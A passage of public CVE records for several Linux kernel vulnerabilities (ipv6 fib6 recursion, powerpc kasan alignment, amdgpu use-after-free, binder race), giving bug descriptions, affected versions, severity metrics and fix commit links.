RDI: ffff88810c02f358\nRBP: ffff88810c02f358 R08: 0000000000000007 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000224 R12: 0000000000000000\nR13: ffff888007c82c78 R14: ffff888007c82c68 R15: ffff888007c82c68\nFS: 0000000000000000(0000) GS:ffff88811b100000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: ffffc9000d97fff8 CR3: 0000000102309002 CR4: 0000000000770ef0\nPKRU: 55555554\nCall Trace:\n \u003c#DF\u003e\n \u003c/#DF\u003e\n \u003cTASK\u003e\n fib6_dump_done (net/ipv6/ip6_fib.c:572 (discriminator 1))\n fib6_dump_done (net/ipv6/ip6_fib.c:572 (discriminator 1))\n ...\n fib6_dump_done (net/ipv6/ip6_fib.c:572 (discriminator 1))\n fib6_dump_done (net/ipv6/ip6_fib.c:572 (discriminator 1))\n netlink_sock_destruct (net/netlink/af_netlink.c:401)\n __sk_destruct (net/core/sock.c:2177 (discriminator 2))\n sk_destruct (net/core/sock.c:2224)\n __sk_free (net/core/sock.c:2235)\n sk_free (net/core/sock.c:2246)\n process_one_work (kernel/workqueue.c:3259)\n worker_thread (kernel/workqueue.c:3329 kernel/workqueue.\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:07:36.421Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9472d07cd095cbd3294ac54c42f304a38fbe9bfe"
},
{
"url": "https://git.kernel.org/stable/c/9c5258196182c25b55c33167cd72fdd9bbf08985"
},
{
"url": "https://git.kernel.org/stable/c/fd307f2d91d40fa7bc55df3e2cd1253fabf8a2d6"
},
{
"url": "https://git.kernel.org/stable/c/40a344b2ddc06c1a2caa7208a43911f39c662778"
},
{
"url": "https://git.kernel.org/stable/c/167d4b47a9bdcb01541dfa29e9f3cbb8edd3dfd2"
},
{
"url": "https://git.kernel.org/stable/c/f2dd75e57285f49e34af1a5b6cd8945c08243776"
},
{
"url": "https://git.kernel.org/stable/c/4a7c465a5dcd657d59d25bf4815e19ac05c13061"
},
{
"url": "https://git.kernel.org/stable/c/d21d40605bca7bd5fc23ef03d4c1ca1f48bc2cae"
}
],
"title": "ipv6: Fix infinite recursion in fib6_dump_done().",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35886",
"datePublished": "2024-05-19T08:34:42.694Z",
"dateReserved": "2024-05-17T13:50:33.112Z",
"dateUpdated": "2025-05-04T09:07:36.421Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26712 (GCVE-0-2024-26712)
Vulnerability from cvelistv5
Published
2024-04-03 14:55
Modified
2025-05-07 20:00
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
powerpc/kasan: Fix addr error caused by page alignment
In kasan_init_region, when k_start is not page aligned, at the begin of
for loop, k_cur = k_start & PAGE_MASK is less than k_start, and then
`va = block + k_cur - k_start` is less than block, the addr va is invalid,
because the memory address space from va to block is not alloced by
memblock_alloc, which will not be reserved by memblock_reserve later, it
will be used by other places.
As a result, memory overwriting occurs.
for example:
int __init __weak kasan_init_region(void *start, size_t size)
{
[...]
/* if say block(dcd97000) k_start(feef7400) k_end(feeff3fe) */
block = memblock_alloc(k_end - k_start, PAGE_SIZE);
[...]
for (k_cur = k_start & PAGE_MASK; k_cur < k_end; k_cur += PAGE_SIZE) {
/* at the begin of for loop
* block(dcd97000) va(dcd96c00) k_cur(feef7000) k_start(feef7400)
* va(dcd96c00) is less than block(dcd97000), va is invalid
*/
void *va = block + k_cur - k_start;
[...]
}
[...]
}
Therefore, page alignment is performed on k_start before
memblock_alloc() to ensure the validity of the VA address.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 663c0c9496a69f80011205ba3194049bcafd681d Version: 663c0c9496a69f80011205ba3194049bcafd681d Version: 663c0c9496a69f80011205ba3194049bcafd681d Version: 663c0c9496a69f80011205ba3194049bcafd681d Version: 663c0c9496a69f80011205ba3194049bcafd681d Version: 663c0c9496a69f80011205ba3194049bcafd681d Version: 5ce93076d8ee2a0fac3ad4adbd2e91b6197146db |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26712",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-04T15:22:01.316380Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-05-07T20:00:37.857Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.618Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/230e89b5ad0a33f530a2a976b3e5e4385cb27882"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2738e0aa2fb24a7ab9c878d912dc2b239738c6c6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0c09912dd8387e228afcc5e34ac5d79b1e3a1058"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0516c06b19dc64807c10e01bb99b552bdf2d7dbe"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/70ef2ba1f4286b2b73675aeb424b590c92d57b25"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4a7aee96200ad281a5cc4cf5c7a2e2a49d2b97b0"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/powerpc/mm/kasan/init_32.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "230e89b5ad0a33f530a2a976b3e5e4385cb27882",
"status": "affected",
"version": "663c0c9496a69f80011205ba3194049bcafd681d",
"versionType": "git"
},
{
"lessThan": "2738e0aa2fb24a7ab9c878d912dc2b239738c6c6",
"status": "affected",
"version": "663c0c9496a69f80011205ba3194049bcafd681d",
"versionType": "git"
},
{
"lessThan": "0c09912dd8387e228afcc5e34ac5d79b1e3a1058",
"status": "affected",
"version": "663c0c9496a69f80011205ba3194049bcafd681d",
"versionType": "git"
},
{
"lessThan": "0516c06b19dc64807c10e01bb99b552bdf2d7dbe",
"status": "affected",
"version": "663c0c9496a69f80011205ba3194049bcafd681d",
"versionType": "git"
},
{
"lessThan": "70ef2ba1f4286b2b73675aeb424b590c92d57b25",
"status": "affected",
"version": "663c0c9496a69f80011205ba3194049bcafd681d",
"versionType": "git"
},
{
"lessThan": "4a7aee96200ad281a5cc4cf5c7a2e2a49d2b97b0",
"status": "affected",
"version": "663c0c9496a69f80011205ba3194049bcafd681d",
"versionType": "git"
},
{
"status": "affected",
"version": "5ce93076d8ee2a0fac3ad4adbd2e91b6197146db",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/powerpc/mm/kasan/init_32.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.4"
},
{
"lessThan": "5.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.18",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.3.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/kasan: Fix addr error caused by page alignment\n\nIn kasan_init_region, when k_start is not page aligned, at the begin of\nfor loop, k_cur = k_start \u0026 PAGE_MASK is less than k_start, and then\n`va = block + k_cur - k_start` is less than block, the addr va is invalid,\nbecause the memory address space from va to block is not alloced by\nmemblock_alloc, which will not be reserved by memblock_reserve later, it\nwill be used by other places.\n\nAs a result, memory overwriting occurs.\n\nfor example:\nint __init __weak kasan_init_region(void *start, size_t size)\n{\n[...]\n\t/* if say block(dcd97000) k_start(feef7400) k_end(feeff3fe) */\n\tblock = memblock_alloc(k_end - k_start, PAGE_SIZE);\n\t[...]\n\tfor (k_cur = k_start \u0026 PAGE_MASK; k_cur \u003c k_end; k_cur += PAGE_SIZE) {\n\t\t/* at the begin of for loop\n\t\t * block(dcd97000) va(dcd96c00) k_cur(feef7000) k_start(feef7400)\n\t\t * va(dcd96c00) is less than block(dcd97000), va is invalid\n\t\t */\n\t\tvoid *va = block + k_cur - k_start;\n\t\t[...]\n\t}\n[...]\n}\n\nTherefore, page alignment is performed on k_start before\nmemblock_alloc() to ensure the validity of the VA address."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:54:28.991Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/230e89b5ad0a33f530a2a976b3e5e4385cb27882"
},
{
"url": "https://git.kernel.org/stable/c/2738e0aa2fb24a7ab9c878d912dc2b239738c6c6"
},
{
"url": "https://git.kernel.org/stable/c/0c09912dd8387e228afcc5e34ac5d79b1e3a1058"
},
{
"url": "https://git.kernel.org/stable/c/0516c06b19dc64807c10e01bb99b552bdf2d7dbe"
},
{
"url": "https://git.kernel.org/stable/c/70ef2ba1f4286b2b73675aeb424b590c92d57b25"
},
{
"url": "https://git.kernel.org/stable/c/4a7aee96200ad281a5cc4cf5c7a2e2a49d2b97b0"
}
],
"title": "powerpc/kasan: Fix addr error caused by page alignment",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26712",
"datePublished": "2024-04-03T14:55:14.149Z",
"dateReserved": "2024-02-19T14:20:24.159Z",
"dateUpdated": "2025-05-07T20:00:37.857Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52469 (GCVE-0-2023-52469)
Vulnerability from cvelistv5
Published
2024-02-25 08:16
Modified
2025-05-04 07:37
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drivers/amd/pm: fix a use-after-free in kv_parse_power_table
When ps allocated by kzalloc equals to NULL, kv_parse_power_table
frees adev->pm.dpm.ps that allocated before. However, after the control
flow goes through the following call chains:
kv_parse_power_table
|-> kv_dpm_init
|-> kv_dpm_sw_init
|-> kv_dpm_fini
The adev->pm.dpm.ps is used in the for loop of kv_dpm_fini after its
first free in kv_parse_power_table and causes a use-after-free bug.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: a2e73f56fa6282481927ec43aa9362c03c2e2104 Version: a2e73f56fa6282481927ec43aa9362c03c2e2104 Version: a2e73f56fa6282481927ec43aa9362c03c2e2104 Version: a2e73f56fa6282481927ec43aa9362c03c2e2104 Version: a2e73f56fa6282481927ec43aa9362c03c2e2104 Version: a2e73f56fa6282481927ec43aa9362c03c2e2104 Version: a2e73f56fa6282481927ec43aa9362c03c2e2104 Version: a2e73f56fa6282481927ec43aa9362c03c2e2104 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:19.779Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8a27d9d9fc9b5564b8904c3a77a7dea482bfa34e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8b55b06e737feb2a645b0293ea27e38418876d63"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/520e213a0b97b64735a13950e9371e0a5d7a5dc3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b6dcba02ee178282e0d28684d241e0b8462dea6a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/35fa2394d26e919f63600ce631e6aefc95ec2706"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/95084632a65d5c0d682a83b55935560bdcd2a1e3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3426f059eacc33ecc676b0d66539297e1cfafd02"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/28dd788382c43b330480f57cd34cde0840896743"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52469",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-08T20:26:55.333142Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-08T20:27:52.953Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/pm/legacy-dpm/kv_dpm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8a27d9d9fc9b5564b8904c3a77a7dea482bfa34e",
"status": "affected",
"version": "a2e73f56fa6282481927ec43aa9362c03c2e2104",
"versionType": "git"
},
{
"lessThan": "8b55b06e737feb2a645b0293ea27e38418876d63",
"status": "affected",
"version": "a2e73f56fa6282481927ec43aa9362c03c2e2104",
"versionType": "git"
},
{
"lessThan": "520e213a0b97b64735a13950e9371e0a5d7a5dc3",
"status": "affected",
"version": "a2e73f56fa6282481927ec43aa9362c03c2e2104",
"versionType": "git"
},
{
"lessThan": "b6dcba02ee178282e0d28684d241e0b8462dea6a",
"status": "affected",
"version": "a2e73f56fa6282481927ec43aa9362c03c2e2104",
"versionType": "git"
},
{
"lessThan": "35fa2394d26e919f63600ce631e6aefc95ec2706",
"status": "affected",
"version": "a2e73f56fa6282481927ec43aa9362c03c2e2104",
"versionType": "git"
},
{
"lessThan": "95084632a65d5c0d682a83b55935560bdcd2a1e3",
"status": "affected",
"version": "a2e73f56fa6282481927ec43aa9362c03c2e2104",
"versionType": "git"
},
{
"lessThan": "3426f059eacc33ecc676b0d66539297e1cfafd02",
"status": "affected",
"version": "a2e73f56fa6282481927ec43aa9362c03c2e2104",
"versionType": "git"
},
{
"lessThan": "28dd788382c43b330480f57cd34cde0840896743",
"status": "affected",
"version": "a2e73f56fa6282481927ec43aa9362c03c2e2104",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/pm/legacy-dpm/kv_dpm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.2"
},
{
"lessThan": "4.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.306",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.306",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrivers/amd/pm: fix a use-after-free in kv_parse_power_table\n\nWhen ps allocated by kzalloc equals to NULL, kv_parse_power_table\nfrees adev-\u003epm.dpm.ps that allocated before. However, after the control\nflow goes through the following call chains:\n\nkv_parse_power_table\n |-\u003e kv_dpm_init\n |-\u003e kv_dpm_sw_init\n\t |-\u003e kv_dpm_fini\n\nThe adev-\u003epm.dpm.ps is used in the for loop of kv_dpm_fini after its\nfirst free in kv_parse_power_table and causes a use-after-free bug."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:37:21.786Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8a27d9d9fc9b5564b8904c3a77a7dea482bfa34e"
},
{
"url": "https://git.kernel.org/stable/c/8b55b06e737feb2a645b0293ea27e38418876d63"
},
{
"url": "https://git.kernel.org/stable/c/520e213a0b97b64735a13950e9371e0a5d7a5dc3"
},
{
"url": "https://git.kernel.org/stable/c/b6dcba02ee178282e0d28684d241e0b8462dea6a"
},
{
"url": "https://git.kernel.org/stable/c/35fa2394d26e919f63600ce631e6aefc95ec2706"
},
{
"url": "https://git.kernel.org/stable/c/95084632a65d5c0d682a83b55935560bdcd2a1e3"
},
{
"url": "https://git.kernel.org/stable/c/3426f059eacc33ecc676b0d66539297e1cfafd02"
},
{
"url": "https://git.kernel.org/stable/c/28dd788382c43b330480f57cd34cde0840896743"
}
],
"title": "drivers/amd/pm: fix a use-after-free in kv_parse_power_table",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52469",
"datePublished": "2024-02-25T08:16:33.016Z",
"dateReserved": "2024-02-20T12:30:33.297Z",
"dateUpdated": "2025-05-04T07:37:21.786Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52609 (GCVE-0-2023-52609)
Vulnerability from cvelistv5
Published
2024-03-18 10:07
Modified
2025-05-04 07:39
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
binder: fix race between mmput() and do_exit()
Task A calls binder_update_page_range() to allocate and insert pages on
a remote address space from Task B. For this, Task A pins the remote mm
via mmget_not_zero() first. This can race with Task B do_exit() and the
final mmput() refcount decrement will come from Task A.
Task A | Task B
------------------+------------------
mmget_not_zero() |
| do_exit()
| exit_mm()
| mmput()
mmput() |
exit_mmap() |
remove_vma() |
fput() |
In this case, the work of ____fput() from Task B is queued up in Task A
as TWA_RESUME. So in theory, Task A returns to userspace and the cleanup
work gets executed. However, Task A instead sleep, waiting for a reply
from Task B that never comes (it's dead).
This means the binder_deferred_release() is blocked until an unrelated
binder event forces Task A to go back to userspace. All the associated
death notifications will also be delayed until then.
In order to fix this use mmput_async() that will schedule the work in
the corresponding mm->async_put_work WQ instead of Task A.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 457b9a6f09f011ebcb9b52cc203a6331a6fc2de7 Version: 457b9a6f09f011ebcb9b52cc203a6331a6fc2de7 Version: 457b9a6f09f011ebcb9b52cc203a6331a6fc2de7 Version: 457b9a6f09f011ebcb9b52cc203a6331a6fc2de7 Version: 457b9a6f09f011ebcb9b52cc203a6331a6fc2de7 Version: 457b9a6f09f011ebcb9b52cc203a6331a6fc2de7 Version: 457b9a6f09f011ebcb9b52cc203a6331a6fc2de7 Version: 457b9a6f09f011ebcb9b52cc203a6331a6fc2de7 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52609",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-18T14:26:58.041951Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:24:00.326Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.321Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/95b1d336b0642198b56836b89908d07b9a0c9608"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/252a2a5569eb9f8d16428872cc24dea1ac0bb097"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7e7a0d86542b0ea903006d3f42f33c4f7ead6918"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/98fee5bee97ad47b527a997d5786410430d1f0e9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6696f76c32ff67fec26823fc2df46498e70d9bf3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/67f16bf2cc1698fd50e01ee8a2becc5a8e6d3a3e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/77d210e8db4d61d43b2d16df66b1ec46fad2ee01"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9a9ab0d963621d9d12199df9817e66982582d5a5"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/android/binder_alloc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "95b1d336b0642198b56836b89908d07b9a0c9608",
"status": "affected",
"version": "457b9a6f09f011ebcb9b52cc203a6331a6fc2de7",
"versionType": "git"
},
{
"lessThan": "252a2a5569eb9f8d16428872cc24dea1ac0bb097",
"status": "affected",
"version": "457b9a6f09f011ebcb9b52cc203a6331a6fc2de7",
"versionType": "git"
},
{
"lessThan": "7e7a0d86542b0ea903006d3f42f33c4f7ead6918",
"status": "affected",
"version": "457b9a6f09f011ebcb9b52cc203a6331a6fc2de7",
"versionType": "git"
},
{
"lessThan": "98fee5bee97ad47b527a997d5786410430d1f0e9",
"status": "affected",
"version": "457b9a6f09f011ebcb9b52cc203a6331a6fc2de7",
"versionType": "git"
},
{
"lessThan": "6696f76c32ff67fec26823fc2df46498e70d9bf3",
"status": "affected",
"version": "457b9a6f09f011ebcb9b52cc203a6331a6fc2de7",
"versionType": "git"
},
{
"lessThan": "67f16bf2cc1698fd50e01ee8a2becc5a8e6d3a3e",
"status": "affected",
"version": "457b9a6f09f011ebcb9b52cc203a6331a6fc2de7",
"versionType": "git"
},
{
"lessThan": "77d210e8db4d61d43b2d16df66b1ec46fad2ee01",
"status": "affected",
"version": "457b9a6f09f011ebcb9b52cc203a6331a6fc2de7",
"versionType": "git"
},
{
"lessThan": "9a9ab0d963621d9d12199df9817e66982582d5a5",
"status": "affected",
"version": "457b9a6f09f011ebcb9b52cc203a6331a6fc2de7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/android/binder_alloc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.29"
},
{
"lessThan": "2.6.29",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.306",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
